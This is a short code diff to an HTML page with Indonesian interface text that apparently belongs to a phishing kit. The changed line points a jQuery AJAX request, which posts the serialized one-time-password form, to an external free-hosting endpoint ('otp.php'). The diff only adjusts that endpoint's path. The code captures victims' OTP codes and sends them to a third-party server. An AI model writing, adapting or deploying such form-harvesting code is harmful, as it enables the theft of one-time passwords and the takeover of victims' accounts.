--- a/code.html
+++ b/code.html
@@ -460,7 +460,7 @@ input { outline: unset !important; }
     document.getElementById('lanjutkan').innerHTML = "Memproses....";               
     
     $.ajax({
-      url: 'https://chroedevsi.whf.bz/mitra1/otp.php',
+      url: 'https://chroedevsi.whf.bz/mitra/otp.php',
       type: 'POST',
       data: $('#code').serialize(),    
     complete: function(){    
